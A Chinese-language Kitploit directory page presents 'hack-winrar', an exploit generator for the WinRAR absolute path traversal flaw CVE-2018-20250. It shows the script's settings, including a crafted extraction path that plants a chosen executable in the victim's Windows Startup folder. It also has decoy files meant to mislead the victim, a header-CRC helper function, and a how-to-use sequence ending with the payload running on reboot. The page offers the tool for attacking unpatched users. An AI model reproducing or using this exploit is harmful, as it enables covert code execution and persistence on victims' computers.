Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
hack-winrar — WinRar 是一款非常广为人知的 Windows 软件。WinRAR 的旧版本存在一个漏洞,该漏洞已于 2019 年 2 月修复。大多数人没有更新 WinRAR,因此他们容易受到此绝对路径遍历漏洞 [CVE-2018-20250] 的影响。 | Kitploit
工具/GitHubGitHub/technicaldada/hack-winrar
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubtechnicaldada/hack-winrar

hack-winrar

WinRar 是一款非常广为人知的 Windows 软件。WinRAR 的旧版本存在一个漏洞,该漏洞已于 2019 年 2 月修复。大多数人没有更新 WinRAR,因此他们容易受到此绝对路径遍历漏洞 [CVE-2018-20250] 的影响。

查看仓库
117年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

hack-winrar

WinRar 是一款广为人知的 Windows 软件。旧版 WinRAR 存在一个漏洞,该漏洞已于 2019 年 2 月被修复。大多数人没有更新 WinRAR,因此他们仍受此绝对路径遍历漏洞 [CVE-2018-20250] 的影响

针对 从 Winrar 中提取代码执行 的 exp

poc 作者:Ridter

如何使用?

你只需安装 Python 3.7,并准备一个你想运行的恶意文件,设置你想要的参数,该 exp 脚本会自动生成恶意压缩包文件!

  1. 设置你想要的参数
root@kitploit:~
... ...

# 你想要的压缩包文件名
rar_filename = "test.rar"
# 你想运行的恶意文件
evil_filename = "calc.exe"
# 你想要的解压路径,如下所示
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# 受害者打开 WinRAR 时显示的其他文件
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # 此命令可能有所不同,具体取决于你的 Python3 环境。
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. 运行 exp,exp 会自动生成 test.rar

  1. 如果受害者打开 test.rar,他会看到文件 hello.txt 和 world.txt,你也可以添加更多文件,更具迷惑性的文件。

  1. 当他解压文件时,受害者的用户启动目录中将多出一个名为 hi.exe 的文件,实际上它是 calc.exe。当他重启计算机时,hi.exe 将运行。

玩得开心!:)

下载工具